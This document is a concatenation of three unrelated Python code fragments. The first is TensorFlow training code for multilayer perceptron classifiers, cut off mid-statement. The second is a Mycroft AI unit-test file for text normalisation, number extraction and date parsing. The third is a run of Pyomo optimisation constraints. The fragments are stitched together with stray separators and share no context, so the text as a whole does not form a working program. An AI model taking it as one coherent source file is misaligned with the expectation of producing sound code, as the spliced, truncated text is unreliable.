input_labels = tf.placeholder(tf.float32, shape=(None, NUM_CLASSES))
dropout_keep_prob = tf.placeholder(tf.float32)
w_1 = tf.Variable(tf.truncated_normal([IMAGE_RES * IMAGE_RES, 1024]))
b_1 = tf.Variable(tf.zeros([1024]))
layer_1 = tf.nn.relu(tf.matmul(input_data, w_1) + b_1)
layer_1 = tf.nn.dropout(layer_1, dropout_keep_prob)
w_2 = tf.Variable(tf.truncated_normal([1024, NUM_CLASSES]))
b_2 = tf.Variable(tf.zeros(NUM_CLASSES))
logits = tf.matmul(layer_1, w_2) + b_2
prediction_op = tf.nn.softmax(logits)
unregularized_loss = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(labels=input_labels, logits=logits),
)
l2_loss = reg_coeff * (l2(w_1) + l2(w_2))
loss = unregularized_loss + l2_loss
optimizer = tf.train.AdamOptimizer(learning_rate=(1e-4), epsilon=1e-3).minimize(loss)
with tf.Session(graph=graph) as sess:
tf.global_variables_initializer().run()
logger.info('Initialized')
for step in range(100000000):
offset = (step * batch_size) % (num_samples - batch_size)
batch_data = train_dataset[offset:(offset + batch_size), :]
batch_labels = train_labels[offset:(offset + batch_size), :]
feed_dict = {input_data: batch_data, input_labels: batch_labels, dropout_keep_prob: 0.5}
sess.run(optimizer, feed_dict=feed_dict)
if step % 1000 == 0:
l, ureg_l, l2l, predictions = sess.run(
[loss, unregularized_loss, l2_loss, prediction_op],
feed_dict=feed_dict,
)
logger.info('Minibatch loss at step %d is %f %f %f', step, l, ureg_l, l2l)
logger.info('Minibatch accuracy: %.1f%%', calc_accuracy(predictions, batch_labels))
def evaluate(data, labels):
"""Calculate accuracy for dataset."""
predictions, l = sess.run(
[prediction_op, loss],
feed_dict={input_data: data, input_labels: labels, dropout_keep_prob: 1}
)
return calc_accuracy(predictions, labels), l
train_acc, train_loss = evaluate(train_dataset, train_labels)
test_acc, test_loss = evaluate(test_dataset, test_labels)
logger.info('Train accuracy: %.1f%% loss: %f', train_acc, train_loss)
logger.info('Test accuracy: %.1f%% loss: %f', test_acc, test_loss)
def train_deeper(train_dataset, train_labels, test_dataset, test_labels):
"""
Training perceptron with more hidden layers.
This requires more regularization techniques, especially xavier weight initialization and
batch normalization (as well as weight decay and dropout).
"""
batch_size = 256
num_samples = train_dataset.shape[0]
graph = tf.Graph()
with graph.as_default():
tf.set_random_seed(52)
x = tf.placeholder(tf.float32, shape=(None, IMAGE_RES * IMAGE_RES), name='x')
y = tf.placeholder(tf.float32, shape=(None, NUM_CLASSES), name='y')
keep_prob = tf.placeholder(tf.float32)
is_training = tf.placeholder(tf.bool, name='is_training')
fc1 = dense_regularized(x, 1024, is_training, keep_prob, None, 'fc1')
fc2 = dense_regularized(fc1, 300, is_training, keep_prob, None, 'fc2')
fc3 = dense_regularized(fc2, 50, is_training, keep_prob, None, 'fc3')
logits = dense(fc3, NUM_CLASSES, None, 'logits')
with tf.name_scope('accuracy'):
accuracy = tf.reduce_mean(
tf.cast(tf.equal(tf.argmax(y, 1), tf.argmax(logits, 1)), tf.float32),
)
with tf.name_scope('loss'):
loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=y))
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
# Ensures that we execute the update_ops before performing the train_step
train_step = tf.train.AdamOptimizer(learning_rate=1e-3, epsilon=1e-3).minimize(loss)
with tf.Session(graph=graph) as sess:
tf.global_variables_initializer().run()
logger.info('Initialized')
for step in range(100000000):
offset = (step * batch_size) % (num_samples - batch_size)
batch_data = train_dataset[offset:(offset + batch_size), :]
batch_labels = train_labels[offset:(offset + batch_size), :]
feed = {x: batch_data, y: batch_labels, keep_prob: 0.5, is_training: True}
sess.run(train_step, feed_dict=feed)
if step % 1000 == 0:
test_feed = {x: batch_data, y: batch_labels, keep_prob: 0.5, is_training: False}
ac, l = sess.run([accuracy, loss], feed_dict=test_feed)
logger.info('Minibatch loss at step %d is %f', step, l)
logger.info('Minibatch accuracy: %.2f%%', ac * 100)
sample_logits = sess.run(
logits, feed_dict={x: batch_data[:1], keep_prob: 1, is_training: False},
)
logger.info(
'Sample logits: %r mean: %f',
sample_logits, np.mean(np.absolute(sample_logits)),
)
train_ac, train_l = sess.run(
[accuracy, loss],
feed_dict={x: train_dataset, y: train_labels, keep_prob: 1, is_training: False},
)
test_ac, test_l = sess.run(
[accuracy, loss],
feed_dict={x: test_dataset, y: test_labels, keep_prob: 1, is_training: False},
)
logger.info('Train accuracy: %.2f%% loss: %f', train_ac * 100, train_l)
logger.info('Test accuracy: %.2f%% loss: %f', test_ac * 100, test_l)
def train_deeper_better(train_data, train_labels, test_data, test_labels, params):
"""Same as 'train_deeper', but now with tf.contrib.data.Dataset input pipeline."""
default_params = {
'regularization_coeff': 0.00001,
'keep_prob': 0.5,
'batch_size': 128,
'fc1_size': 2048,
'fc2_size': 1024,
'fc3_size': 1024,
'fc4_size': 1024,
'fc5_size': 512,
'activation': 'relu',
}
activation_funcs = {
'relu': tf.nn.relu,
'tanh': tf.nn.tanh,
}
def get_param(name):
if name in params:
return params[name]
logger.warning('%s not found in param, use default value %r', name, default_params[name])
return default_params[name]
regularization_coeff = get_param('regularization_coeff')
keep_prob_param = get_param('keep_prob')
batch_size = int(get_param('batch_size'))
fc1_size = int(get_param('fc1_size'))
fc2_size = int(get_param('fc2_size'))
fc3_size = int(get_param('fc3_size'))
fc4_size = int(get_param('fc4_size'))
fc5_size = int(get_param('fc5_size'))
activation_func = activation_funcs[get_param('activation')]
save_restore = False
time_limit_seconds = 3600
saver_path = join(SAVER_FOLDER, train_deeper_better.__name__)
graph = tf.Graph()
with graph.as_default():
tf.set_random_seed(52)
global_step_tensor = tf.contrib.framework.get_or_create_global_step()
epoch_tensor = tf.Variable(0, trainable=False, name='epoch')
next_epoch = tf.assign_add(epoch_tensor, 1)
# dataset definition
dataset = Dataset.from_tensor_slices({'x': train_data, 'y': train_labels})
dataset = dataset.shuffle(buffer_size=10000)
dataset = dataset.batch(batch_size)
iterator = dataset.make_initializable_iterator()
sample = iterator.get_next()
x = sample['x']
y = sample['y']
# actual computation graph
keep_prob = tf.placeholder(tf.float32)
is_training = tf.placeholder(tf.bool, name='is_training')
regularizer = tf.contrib.layers.l2_regularizer(scale=regularization_coeff)
def fully_connected(x, size, name):
return dense_regularized(
x, size, is_training, keep_prob, regularizer, name, activation_func,
)
fc1 = fully_connected(x, fc1_size, 'fc1')
fc2 = fully_connected(fc1, fc2_size, 'fc2')
fc3 = fully_connected(fc2, fc3_size, 'fc3')
fc4 = fully_connected(fc3, fc4_size, 'fc4')
fc5 = fully_connected(fc4, fc5_size, 'fc5')
logits = dense(fc5, NUM_CLASSES, regularizer, 'logits')
layer_summaries(logits, 'logits_summaries')
with tf.name_scope('accuracy'):
accuracy = tf.reduce_mean(
tf.cast(tf.equal(tf.argmax(y, 1), tf.argmax(logits, 1)), tf.float32),
)
accuracy_percent = 100 * accuracy
tf.summary.scalar('accuracy_percent', accuracy_percent)
with tf.name_scope('loss'):
regularization_losses = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)
regularization_loss = tf.reduce_sum(regularization_losses)
cross_entropy_loss = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=y),
)
loss = cross_entropy_loss + regularization_loss
tf.summary.scalar('regularization_loss', regularization_loss)
tf.summary.scalar('cross_entropy_loss', cross_entropy_loss)
tf.summary.scalar('loss', loss)
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
# ensures that we execute the update_ops before performing the train_op
# needed for batch normalization (apparently)
optimizer = tf.train.AdamOptimizer(learning_rate=(1e-4), epsilon=1e-3)
train_op = optimizer.minimize(loss, global_step=global_step_tensor)
all_summaries = tf.summary.merge_all()
train_writer = tf.summary.FileWriter(join(SUMMARY_FOLDER, 'train'))
batch_writer = tf.summary.FileWriter(join(SUMMARY_FOLDER, 'batch'))
test_writer = tf.summary.FileWriter(join(SUMMARY_FOLDER, 'test'))
saver = tf.train.Saver(max_to_keep=3)
test_accuracy = 0
best_accuracy = 0
with tf.Session(graph=graph) as sess:
restored = False
if save_restore:
try:
saver.restore(sess, tf.train.latest_checkpoint(checkpoint_dir=SAVER_FOLDER))
restored = True
except ValueError as exc:
logger.info('Could not restore | |
<gh_stars>0
# -*- coding: iso-8859-15 -*-
#
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
from datetime import datetime
from mycroft.util.parse import get_gender
from mycroft.util.parse import extract_datetime
from mycroft.util.parse import extractnumber
from mycroft.util.parse import normalize
class TestNormalize(unittest.TestCase):
def test_articles(self):
self.assertEqual(normalize("this is a test", remove_articles=True),
"this is test")
self.assertEqual(normalize("this is the test", remove_articles=True),
"this is test")
self.assertEqual(normalize("and another test", remove_articles=True),
"and another test")
self.assertEqual(normalize("this is an extra test",
remove_articles=False),
"this is an extra test")
def test_extractnumber(self):
self.assertEqual(extractnumber("this is the first test"), 1)
self.assertEqual(extractnumber("this is 2 test"), 2)
self.assertEqual(extractnumber("this is second test"), 2)
self.assertEqual(extractnumber("this is the third test"), 1.0 / 3.0)
self.assertEqual(extractnumber("this is test number 4"), 4)
self.assertEqual(extractnumber("one third of a cup"), 1.0 / 3.0)
self.assertEqual(extractnumber("three cups"), 3)
self.assertEqual(extractnumber("1/3 cups"), 1.0 / 3.0)
self.assertEqual(extractnumber("quarter cup"), 0.25)
self.assertEqual(extractnumber("1/4 cup"), 0.25)
self.assertEqual(extractnumber("one fourth cup"), 0.25)
self.assertEqual(extractnumber("2/3 cups"), 2.0 / 3.0)
self.assertEqual(extractnumber("3/4 cups"), 3.0 / 4.0)
self.assertEqual(extractnumber("1 and 3/4 cups"), 1.75)
self.assertEqual(extractnumber("1 cup and a half"), 1.5)
self.assertEqual(extractnumber("one cup and a half"), 1.5)
self.assertEqual(extractnumber("one and a half cups"), 1.5)
self.assertEqual(extractnumber("one and one half cups"), 1.5)
self.assertEqual(extractnumber("three quarter cups"), 3.0 / 4.0)
self.assertEqual(extractnumber("three quarters cups"), 3.0 / 4.0)
def test_extractdatetime_en(self):
def extractWithFormat(text):
date = datetime(2017, 06, 27, 00, 00)
[extractedDate, leftover] = extract_datetime(text, date)
extractedDate = extractedDate.strftime("%Y-%m-%d %H:%M:%S")
return [extractedDate, leftover]
def testExtract(text, expected_date, expected_leftover):
res = extractWithFormat(text)
self.assertEqual(res[0], expected_date)
self.assertEqual(res[1], expected_leftover)
testExtract("Set the ambush for 5 days from today",
"2017-07-02 00:00:00", "set ambush")
testExtract("What is the day after tomorrow's weather?",
"2017-06-29 00:00:00", "what is weather")
testExtract("Remind me at 10:45 pm",
"2017-06-27 22:45:00", "remind me")
testExtract("what is the weather on friday morning",
"2017-06-30 08:00:00", "what is weather")
testExtract("what is tomorrow's weather",
"2017-06-28 00:00:00", "what is weather")
testExtract("remind me to call mom in 8 weeks and 2 days",
"2017-08-24 00:00:00", "remind me to call mom")
testExtract("Play Rick Astley music 2 days from Friday",
"2017-07-02 00:00:00", "play rick astley music")
testExtract("Begin the invasion at 3:45 pm on Thursday",
"2017-06-29 15:45:00", "begin invasion")
testExtract("On Monday, order pie from the bakery",
"2017-07-03 00:00:00", "order pie from bakery")
testExtract("Play Happy Birthday music 5 years from today",
"2022-06-27 00:00:00", "play happy birthday music")
testExtract("Skype Mom at 12:45 pm next Thursday",
"2017-07-06 12:45:00", "skype mom")
testExtract("What's the weather next Thursday?",
"2017-07-06 00:00:00", "what weather")
testExtract("what is the weather next friday morning",
"2017-07-07 08:00:00", "what is weather")
testExtract("what is the weather next friday evening",
"2017-07-07 19:00:00", "what is weather")
testExtract("what is the weather next friday afternoon",
"2017-07-07 15:00:00", "what is weather")
testExtract("remind me to call mom on august 3rd",
"2017-08-03 00:00:00", "remind me to call mom")
testExtract("Buy fireworks on the 4th of July",
"2017-07-04 00:00:00", "buy fireworks")
testExtract("what is the weather 2 weeks from next friday",
"2017-07-21 00:00:00", "what is weather")
testExtract("what is the weather wednesday at 0700 hours",
"2017-06-28 07:00:00", "what is weather")
testExtract("what is the weather wednesday at 7 o'clock",
"2017-06-28 07:00:00", "what is weather")
testExtract("Set up an appointment at 12:45 pm next Thursday",
"2017-07-06 12:45:00", "set up appointment")
testExtract("What's the weather this Thursday?",
"2017-06-29 00:00:00", "what weather")
testExtract("set up the visit for 2 weeks and 6 days from Saturday",
"2017-07-21 00:00:00", "set up visit")
testExtract("Begin the invasion at 03 45 on Thursday",
"2017-06-29 03:45:00", "begin invasion")
testExtract("Begin the invasion at o 800 hours on Thursday",
"2017-06-29 08:00:00", "begin invasion")
testExtract("Begin the party at 8 o'clock in the evening on Thursday",
"2017-06-29 20:00:00", "begin party")
testExtract("Begin the invasion at 8 in the evening on Thursday",
"2017-06-29 20:00:00", "begin invasion")
testExtract("Begin the invasion on Thursday at noon",
"2017-06-29 12:00:00", "begin invasion")
testExtract("Begin the invasion on Thursday at midnight",
"2017-06-29 00:00:00", "begin invasion")
testExtract("Begin the invasion on Thursday at 0500",
"2017-06-29 05:00:00", "begin invasion")
testExtract("remind me to wake up in 4 years",
"2021-06-27 00:00:00", "remind me to wake up")
testExtract("remind me to wake up in 4 years and 4 days",
"2021-07-01 00:00:00", "remind me to wake up")
testExtract("What is the weather 3 days after tomorrow?",
"2017-07-01 00:00:00", "what is weather")
def test_spaces(self):
self.assertEqual(normalize(" this is a test"),
"this is test")
self.assertEqual(normalize(" this is a test "),
"this is test")
self.assertEqual(normalize(" this is one test"),
"this is 1 test")
def test_numbers(self):
self.assertEqual(normalize("this is a one two three test"),
"this is 1 2 3 test")
self.assertEqual(normalize(" it's a four five six test"),
"it is 4 5 6 test")
self.assertEqual(normalize("it's a seven eight nine test"),
"it is 7 8 9 test")
self.assertEqual(normalize("it's a seven eight nine test"),
"it is 7 8 9 test")
self.assertEqual(normalize("that's a ten eleven twelve test"),
"that is 10 11 12 test")
self.assertEqual(normalize("that's a thirteen fourteen test"),
"that is 13 14 test")
self.assertEqual(normalize("that's fifteen sixteen seventeen"),
"that is 15 16 17")
self.assertEqual(normalize("that's eighteen nineteen twenty"),
"that is 18 19 20")
def test_contractions(self):
self.assertEqual(normalize("ain't"), "is not")
self.assertEqual(normalize("aren't"), "are not")
self.assertEqual(normalize("can't"), "can not")
self.assertEqual(normalize("could've"), "could have")
self.assertEqual(normalize("couldn't"), "could not")
self.assertEqual(normalize("didn't"), "did not")
self.assertEqual(normalize("doesn't"), "does not")
self.assertEqual(normalize("don't"), "do not")
self.assertEqual(normalize("gonna"), "going to")
self.assertEqual(normalize("gotta"), "got to")
self.assertEqual(normalize("hadn't"), "had not")
self.assertEqual(normalize("hadn't have"), "had not have")
self.assertEqual(normalize("hasn't"), "has not")
self.assertEqual(normalize("haven't"), "have not")
# TODO: Ambiguous with "he had"
self.assertEqual(normalize("he'd"), "he would")
self.assertEqual(normalize("he'll"), "he will")
# TODO: Ambiguous with "he has"
self.assertEqual(normalize("he's"), "he is")
# TODO: Ambiguous with "how would"
self.assertEqual(normalize("how'd"), "how did")
self.assertEqual(normalize("how'll"), "how will")
# TODO: Ambiguous with "how has" and "how does"
self.assertEqual(normalize("how's"), "how is")
# TODO: Ambiguous with "I had"
self.assertEqual(normalize("I'd"), "I would")
self.assertEqual(normalize("I'll"), "I will")
self.assertEqual(normalize("I'm"), "I am")
self.assertEqual(normalize("I've"), "I have")
self.assertEqual(normalize("I haven't"), "I have not")
self.assertEqual(normalize("isn't"), "is not")
self.assertEqual(normalize("it'd"), "it would")
self.assertEqual(normalize("it'll"), "it will")
# TODO: Ambiguous with "it has"
self.assertEqual(normalize("it's"), "it is")
self.assertEqual(normalize("it isn't"), "it is not")
self.assertEqual(normalize("mightn't"), "might not")
self.assertEqual(normalize("might've"), "might have")
self.assertEqual(normalize("mustn't"), "must not")
self.assertEqual(normalize("mustn't have"), "must not have")
self.assertEqual(normalize("must've"), "must have")
self.assertEqual(normalize("needn't"), "need not")
self.assertEqual(normalize("oughtn't"), "ought not")
self.assertEqual(normalize("shan't"), "shall not")
# TODO: Ambiguous wiht "she had"
self.assertEqual(normalize("she'd"), "she would")
self.assertEqual(normalize("she hadn't"), "she had not")
self.assertEqual(normalize("she'll"), "she will")
self.assertEqual(normalize("she's"), "she is")
self.assertEqual(normalize("she isn't"), "she is not")
self.assertEqual(normalize("should've"), "should have")
self.assertEqual(normalize("shouldn't"), "should not")
self.assertEqual(normalize("shouldn't have"), "should not have")
self.assertEqual(normalize("somebody's"), "somebody is")
# TODO: Ambiguous with "someone had"
self.assertEqual(normalize("someone'd"), "someone would")
self.assertEqual(normalize("someone hadn't"), "someone had not")
self.assertEqual(normalize("someone'll"), "someone will")
# TODO: Ambiguous with "someone has"
self.assertEqual(normalize("someone's"), "someone is")
self.assertEqual(normalize("that'll"), "that will")
# TODO: Ambiguous with "that has"
self.assertEqual(normalize("that's"), "that is")
# TODO: Ambiguous with "that had"
self.assertEqual(normalize("that'd"), "that would")
# TODO: Ambiguous with "there had"
self.assertEqual(normalize("there'd"), "there would")
self.assertEqual(normalize("there're"), "there are")
# TODO: Ambiguous with "there has"
self.assertEqual(normalize("there's"), "there is")
# TODO: Ambiguous with "they had"
self.assertEqual(normalize("they'd"), "they would")
self.assertEqual(normalize("they'll"), "they will")
self.assertEqual(normalize("they won't have"), "they will not have")
self.assertEqual(normalize("they're"), "they are")
self.assertEqual(normalize("they've"), "they have")
self.assertEqual(normalize("they haven't"), "they have not")
self.assertEqual(normalize("wasn't"), "was not")
# TODO: Ambiguous wiht "we had"
self.assertEqual(normalize("we'd"), "we would")
self.assertEqual(normalize("we would've"), "we would have")
self.assertEqual(normalize("we wouldn't"), "we would not")
self.assertEqual(normalize("we wouldn't have"), "we would not have")
self.assertEqual(normalize("we'll"), "we will")
self.assertEqual(normalize("we won't have"), "we will not have")
self.assertEqual(normalize("we're"), "we are")
self.assertEqual(normalize("we've"), "we have")
self.assertEqual(normalize("weren't"), "were not")
self.assertEqual(normalize("what'd"), "what did")
self.assertEqual(normalize("what'll"), "what will")
self.assertEqual(normalize("what're"), "what are")
# TODO: Ambiguous with "what has" / "what does")
self.assertEqual(normalize("whats"), "what is")
self.assertEqual(normalize("what's"), "what is")
self.assertEqual(normalize("what've"), "what have")
# TODO: Ambiguous with "when has"
self.assertEqual(normalize("when's"), "when is")
self.assertEqual(normalize("where'd"), "where did")
# TODO: Ambiguous with "where has" / where does"
self.assertEqual(normalize("where's"), "where is")
self.assertEqual(normalize("where've"), "where have")
# TODO: Ambiguous with "who had" "who did")
self.assertEqual(normalize("who'd"), "who would")
self.assertEqual(normalize("who'd've"), "who would have")
self.assertEqual(normalize("who'll"), "who will")
self.assertEqual(normalize("who're"), "who are")
# TODO: Ambiguous with "who has" / "who does"
self.assertEqual(normalize("who's"), "who is")
self.assertEqual(normalize("who've"), "who have")
self.assertEqual(normalize("why'd"), "why did")
self.assertEqual(normalize("why're"), "why are")
# TODO: Ambiguous with "why has" / "why does"
self.assertEqual(normalize("why's"), "why is")
| |
= Constraint(expr= m.x965 == 0)
m.c1442 = Constraint(expr= m.x980 == 0)
m.c1443 = Constraint(expr= m.x981 == 0)
m.c1444 = Constraint(expr= m.x720 - m.x962 - m.x964 == 0)
m.c1445 = Constraint(expr= m.x721 - m.x963 - m.x965 == 0)
m.c1446 = Constraint(expr= m.x730 - m.x978 - m.x980 == 0)
m.c1447 = Constraint(expr= m.x731 - m.x979 - m.x981 == 0)
m.c1448 = Constraint(expr= m.x962 - 0.705049913072943*m.b1046 <= 0)
m.c1449 = Constraint(expr= m.x963 - 0.705049913072943*m.b1047 <= 0)
m.c1450 = Constraint(expr= m.x964 + 0.705049913072943*m.b1046 <= 0.705049913072943)
m.c1451 = Constraint(expr= m.x965 + 0.705049913072943*m.b1047 <= 0.705049913072943)
m.c1452 = Constraint(expr= m.x978 - 0.480234946352917*m.b1046 <= 0)
m.c1453 = Constraint(expr= m.x979 - 0.480234946352917*m.b1047 <= 0)
m.c1454 = Constraint(expr= m.x980 + 0.480234946352917*m.b1046 <= 0.480234946352917)
m.c1455 = Constraint(expr= m.x981 + 0.480234946352917*m.b1047 <= 0.480234946352917)
m.c1456 = Constraint(expr=(m.x982/(1e-6 + m.b1048) - log(1 + m.x948/(1e-6 + m.b1048)))*(1e-6 + m.b1048) <= 0)
m.c1457 = Constraint(expr=(m.x983/(1e-6 + m.b1049) - log(1 + m.x949/(1e-6 + m.b1049)))*(1e-6 + m.b1049) <= 0)
m.c1458 = Constraint(expr= m.x952 == 0)
m.c1459 = Constraint(expr= m.x953 == 0)
m.c1460 = Constraint(expr= m.x984 == 0)
m.c1461 = Constraint(expr= m.x985 == 0)
m.c1462 = Constraint(expr= m.x714 - m.x948 - m.x952 == 0)
m.c1463 = Constraint(expr= m.x715 - m.x949 - m.x953 == 0)
m.c1464 = Constraint(expr= m.x732 - m.x982 - m.x984 == 0)
m.c1465 = Constraint(expr= m.x733 - m.x983 - m.x985 == 0)
m.c1466 = Constraint(expr= m.x948 - 0.994083415506506*m.b1048 <= 0)
m.c1467 = Constraint(expr= m.x949 - 0.994083415506506*m.b1049 <= 0)
m.c1468 = Constraint(expr= m.x952 + 0.994083415506506*m.b1048 <= 0.994083415506506)
m.c1469 = Constraint(expr= m.x953 + 0.994083415506506*m.b1049 <= 0.994083415506506)
m.c1470 = Constraint(expr= m.x982 - 0.690184503917672*m.b1048 <= 0)
m.c1471 = Constraint(expr= m.x983 - 0.690184503917672*m.b1049 <= 0)
m.c1472 = Constraint(expr= m.x984 + 0.690184503917672*m.b1048 <= 0.690184503917672)
m.c1473 = Constraint(expr= m.x985 + 0.690184503917672*m.b1049 <= 0.690184503917672)
m.c1474 = Constraint(expr= - 0.9*m.x966 + m.x986 == 0)
m.c1475 = Constraint(expr= - 0.9*m.x967 + m.x987 == 0)
m.c1476 = Constraint(expr= m.x968 == 0)
m.c1477 = Constraint(expr= m.x969 == 0)
m.c1478 = Constraint(expr= m.x988 == 0)
m.c1479 = Constraint(expr= m.x989 == 0)
m.c1480 = Constraint(expr= m.x722 - m.x966 - m.x968 == 0)
m.c1481 = Constraint(expr= m.x723 - m.x967 - m.x969 == 0)
m.c1482 = Constraint(expr= m.x734 - m.x986 - m.x988 == 0)
m.c1483 = Constraint(expr= m.x735 - m.x987 - m.x989 == 0)
m.c1484 = Constraint(expr= m.x966 - 15*m.b1050 <= 0)
m.c1485 = Constraint(expr= m.x967 - 15*m.b1051 <= 0)
m.c1486 = Constraint(expr= m.x968 + 15*m.b1050 <= 15)
m.c1487 = Constraint(expr= m.x969 + 15*m.b1051 <= 15)
m.c1488 = Constraint(expr= m.x986 - 13.5*m.b1050 <= 0)
m.c1489 = Constraint(expr= m.x987 - 13.5*m.b1051 <= 0)
m.c1490 = Constraint(expr= m.x988 + 13.5*m.b1050 <= 13.5)
m.c1491 = Constraint(expr= m.x989 + 13.5*m.b1051 <= 13.5)
m.c1492 = Constraint(expr= - 0.6*m.x970 + m.x990 == 0)
m.c1493 = Constraint(expr= - 0.6*m.x971 + m.x991 == 0)
m.c1494 = Constraint(expr= m.x972 == 0)
m.c1495 = Constraint(expr= m.x973 == 0)
m.c1496 = Constraint(expr= m.x992 == 0)
m.c1497 = Constraint(expr= m.x993 == 0)
m.c1498 = Constraint(expr= m.x724 - m.x970 - m.x972 == 0)
m.c1499 = Constraint(expr= m.x725 - m.x971 - m.x973 == 0)
m.c1500 = Constraint(expr= m.x736 - m.x990 - m.x992 == 0)
m.c1501 = Constraint(expr= m.x737 - m.x991 - m.x993 == 0)
m.c1502 = Constraint(expr= m.x970 - 15*m.b1052 <= 0)
m.c1503 = Constraint(expr= m.x971 - 15*m.b1053 <= 0)
m.c1504 = Constraint(expr= m.x972 + 15*m.b1052 <= 15)
m.c1505 = Constraint(expr= m.x973 + 15*m.b1053 <= 15)
m.c1506 = Constraint(expr= m.x990 - 9*m.b1052 <= 0)
m.c1507 = Constraint(expr= m.x991 - 9*m.b1053 <= 0)
m.c1508 = Constraint(expr= m.x992 + 9*m.b1052 <= 9)
m.c1509 = Constraint(expr= m.x993 + 9*m.b1053 <= 9)
m.c1510 = Constraint(expr= 5*m.b1054 + m.x1114 == 0)
m.c1511 = Constraint(expr= 4*m.b1055 + m.x1115 == 0)
m.c1512 = Constraint(expr= 8*m.b1056 + m.x1116 == 0)
m.c1513 = Constraint(expr= 7*m.b1057 + m.x1117 == 0)
m.c1514 = Constraint(expr= 6*m.b1058 + m.x1118 == 0)
m.c1515 = Constraint(expr= 9*m.b1059 + m.x1119 == 0)
m.c1516 = Constraint(expr= 10*m.b1060 + m.x1120 == 0)
m.c1517 = Constraint(expr= 9*m.b1061 + m.x1121 == 0)
m.c1518 = Constraint(expr= 6*m.b1062 + m.x1122 == 0)
m.c1519 = Constraint(expr= 10*m.b1063 + m.x1123 == 0)
m.c1520 = Constraint(expr= 7*m.b1064 + m.x1124 == 0)
m.c1521 = Constraint(expr= 7*m.b1065 + m.x1125 == 0)
m.c1522 = Constraint(expr= 4*m.b1066 + m.x1126 == 0)
m.c1523 = Constraint(expr= 3*m.b1067 + m.x1127 == 0)
m.c1524 = Constraint(expr= 5*m.b1068 + m.x1128 == 0)
m.c1525 = Constraint(expr= 6*m.b1069 + m.x1129 == 0)
m.c1526 = Constraint(expr= 2*m.b1070 + m.x1130 == 0)
m.c1527 = Constraint(expr= 5*m.b1071 + m.x1131 == 0)
m.c1528 = Constraint(expr= 4*m.b1072 + m.x1132 == 0)
m.c1529 = Constraint(expr= 7*m.b1073 + m.x1133 == 0)
m.c1530 = Constraint(expr= 3*m.b1074 + m.x1134 == 0)
m.c1531 = Constraint(expr= 9*m.b1075 + m.x1135 == 0)
m.c1532 = Constraint(expr= 7*m.b1076 + m.x1136 == 0)
m.c1533 = Constraint(expr= 2*m.b1077 + m.x1137 == 0)
m.c1534 = Constraint(expr= 3*m.b1078 + m.x1138 == 0)
m.c1535 = Constraint(expr= m.b1079 + m.x1139 == 0)
m.c1536 = Constraint(expr= 2*m.b1080 + m.x1140 == 0)
m.c1537 = Constraint(expr= 6*m.b1081 + m.x1141 == 0)
m.c1538 = Constraint(expr= 4*m.b1082 + m.x1142 == 0)
m.c1539 = Constraint(expr= 8*m.b1083 + m.x1143 == 0)
m.c1540 = Constraint(expr= 2*m.b1084 + m.x1144 == 0)
m.c1541 = Constraint(expr= 5*m.b1085 + m.x1145 == 0)
m.c1542 = Constraint(expr= 3*m.b1086 + m.x1146 == 0)
m.c1543 = Constraint(expr= 4*m.b1087 + m.x1147 == 0)
m.c1544 = Constraint(expr= 5*m.b1088 + m.x1148 == 0)
m.c1545 = Constraint(expr= 7*m.b1089 + m.x1149 == 0)
m.c1546 = Constraint(expr= 2*m.b1090 + m.x1150 == 0)
m.c1547 = Constraint(expr= 8*m.b1091 + m.x1151 == 0)
m.c1548 = Constraint(expr= m.b1092 + m.x1152 == 0)
m.c1549 = Constraint(expr= 4*m.b1093 + m.x1153 == 0)
m.c1550 = Constraint(expr= 2*m.b1094 + m.x1154 == 0)
m.c1551 = Constraint(expr= 5*m.b1095 + m.x1155 == 0)
m.c1552 = Constraint(expr= 9*m.b1096 + m.x1156 == 0)
m.c1553 = Constraint(expr= 2*m.b1097 + m.x1157 == 0)
m.c1554 = Constraint(expr= 5*m.b1098 + m.x1158 == 0)
m.c1555 = Constraint(expr= 8*m.b1099 + m.x1159 == 0)
m.c1556 = Constraint(expr= 2*m.b1100 + m.x1160 == 0)
m.c1557 = Constraint(expr= 3*m.b1101 + m.x1161 == 0)
m.c1558 = Constraint(expr= 10*m.b1102 + m.x1162 == 0)
m.c1559 = Constraint(expr= 6*m.b1103 + m.x1163 == 0)
m.c1560 = Constraint(expr= 4*m.b1104 + m.x1164 == 0)
m.c1561 = Constraint(expr= 8*m.b1105 + m.x1165 == 0)
m.c1562 = Constraint(expr= 7*m.b1106 + m.x1166 == 0)
m.c1563 = Constraint(expr= 3*m.b1107 + m.x1167 == 0)
m.c1564 = Constraint(expr= 4*m.b1108 + m.x1168 == 0)
m.c1565 = Constraint(expr= 8*m.b1109 + m.x1169 == 0)
m.c1566 = Constraint(expr= 2*m.b1110 + m.x1170 == 0)
m.c1567 = Constraint(expr= m.b1111 + m.x1171 == 0)
m.c1568 = Constraint(expr= 8*m.b1112 + m.x1172 == 0)
m.c1569 = Constraint(expr= 3*m.b1113 + m.x1173 == 0)
m.c1570 = Constraint(expr= m.b994 - m.b995 <= 0)
m.c1571 = Constraint(expr= m.b996 - m.b997 <= 0)
m.c1572 = Constraint(expr= m.b998 - m.b999 <= 0)
m.c1573 = Constraint(expr= m.b1000 - m.b1001 <= 0)
m.c1574 = Constraint(expr= m.b1002 - m.b1003 <= 0)
m.c1575 = Constraint(expr= m.b1004 - m.b1005 <= 0)
m.c1576 = Constraint(expr= m.b1006 - m.b1007 <= 0)
m.c1577 = Constraint(expr= m.b1008 - m.b1009 <= 0)
m.c1578 = Constraint(expr= m.b1010 - m.b1011 <= 0)
m.c1579 = Constraint(expr= m.b1012 - m.b1013 <= 0)
m.c1580 = Constraint(expr= m.b1014 - m.b1015 <= 0)
m.c1581 = Constraint(expr= m.b1016 - m.b1017 <= 0)
m.c1582 = Constraint(expr= m.b1018 - m.b1019 <= 0)
